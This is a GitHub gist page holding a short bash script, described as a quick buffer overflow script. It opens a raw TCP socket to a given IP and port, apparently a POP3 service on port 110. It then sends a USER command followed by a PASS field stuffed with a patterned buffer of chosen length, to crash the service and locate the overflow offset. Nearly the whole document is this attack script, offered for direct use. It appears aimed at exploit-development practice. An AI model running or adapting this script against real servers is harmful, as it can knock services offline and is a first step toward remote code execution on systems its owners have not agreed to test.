Skip to content

Instantly share code, notes, and snippets.

@natesubra
Last active December 28, 2016 20:22
Show Gist options
  • Save natesubra/965e698075bc176daa0b953cd0de0990 to your computer and use it in GitHub Desktop.
Save natesubra/965e698075bc176daa0b953cd0de0990 to your computer and use it in GitHub Desktop.
Quick and dirty buffer overflow script using bash, tr, and printf
#!/bin/bash
# 1st arg is ip, 2nd is port, 3rd is buffer size
# ex: ./bashfuzz.sh 10.0.0.1 110 2700
[[ -z "$1" ]] && { echo "Parameter 1 is empty (dest ip)" ; exit 1; }
[[ -z "$2" ]] && { echo "Parameter 2 is empty (dest port)" ; exit 1; }
[[ -z "$3" ]] && { echo "Parameter 3 is empty (buffer size)" ; exit 1; }
# different buffer options
# buffer="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 4500 | head -n 1)" # Random Buffer
# buffer="$(printf 'A%.0s' {1..$3})" # Create buffer of As using printf, for some reason it inserts a carriage return
# buffer="$(head -c $3 < /dev/zero | tr '\0' '\101')" # http://www.csgnetwork.com/asciiset.html - Octal code for chars
buffer=""
# Patterned Buffer
for pattern in {a..z}{0..9}{A..Z}{0..9};
do
buffer=$buffer$pattern;
[[ ${#buffer} -ge $3 ]] && break
done
exec 3<>/dev/tcp/$1/$2 # Open Socket - http://xmodulo.com/tcp-udp-socket-bash-shell.html
printf "USER test \r\n" >&3 # Send USER
timeout 1 cat <&3 # Read Response
printf "PASS $buffer \r\n" >&3 # send PASS and BUFFER
timeout 1 cat <&3
# Close Socket
exec 3<&-
exec 3>&-
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment